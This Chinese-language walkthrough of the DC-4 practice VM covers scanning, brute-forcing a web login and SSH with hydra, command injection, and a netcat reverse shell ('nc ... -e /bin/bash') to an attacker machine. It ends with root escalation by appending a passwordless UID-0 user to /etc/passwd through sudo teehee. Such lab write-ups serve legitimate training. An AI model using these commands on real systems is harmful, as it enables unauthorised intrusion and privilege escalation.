该靶机提权思路有点意思，采用修改passwd文件进行root 操作
靶机IP：192.168.8.160

nmap全扫

nmap -sS -Pn -A -p- -n 192.168.8.160

image.png

就基本的常规渗透思路吧

web渗透

image.png

上来就是登录界面

http://192.168.8.160/images/ ，也没什么重要的线索

image.png

后台爆破

无奈只能用大字典跑一遍看看

image.png

发现了一个 登录口令

admin   happy

登录后台

登录可以发现command命令执行

image.png

抓个包试试，执行些命令

果然可以执行任意命令

image.png

命令执行-nc反弹getshell

尝试nc反弹

nc 192.168.8.253 4444 -e /bin/bash

kali中先开启监听

image.png

成功反弹

提权（修改passwd）

进入home目录下，发现了三个用户

image.png

发现只有jim用户下有线索，在backups目录下有个密码备份 old-password.bak

image.png

想必就是jim用户的密码吧

拿来ssh登录爆破下

hydra直接爆

hydra -l jim -P jim ssh://192.168.8.160

image.png

爆破成功，登录口令为

jim  jibril04

jim用户ssh登录

登录后，打开查看mbox，是root用户发来的，

image.png

登录不久后，发现提示了一封新邮件

image.png

进入 该路径下看看

image.png

想必这就是 Charles 的密码

charles   ^xHhA&hvim0y

切换用户charles

image.png

sudo -l

查看用户权限发现，该用户可以以root权限免密码执行 /usr/bin/teehee

get root

之前做过一些渗透是用定时器提权，或者是篡改 passwd 写入一个具有root权限的伪用户进行get root

添加一个 hack用户,并使用teehee执行写入 passwd中

echo "hack::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

参数解释

#如：admin:x:0:0::/home/admin:/bin/bash

#[用户名]：[密码]：[UID]：[GID]：[身份描述]：[主目录]：[登录shell]

修改完passwd文件，重启一下靶机，直接可以无密码切换hack用户

直接

su hack

image.png

直接无密码进入，是root权限

get flag

image.png

总结

1、该靶机渗透在web信息收集阶段并没有什么有用的线索，就直接想到后台爆破即可

2、在反弹getshell后发现一封邮件，拿到新用户的登录口令

3、进入新用户的目录中，发现其具有超级用户的权限执行，采用修改passwd文件，添加一个免密码的超级用户，进行提权

DC-4靶机百度云下载
链接：https://pan.baidu.com/s/1ftpEws_F4_v2OYpruVxkYw
提取码：bj2t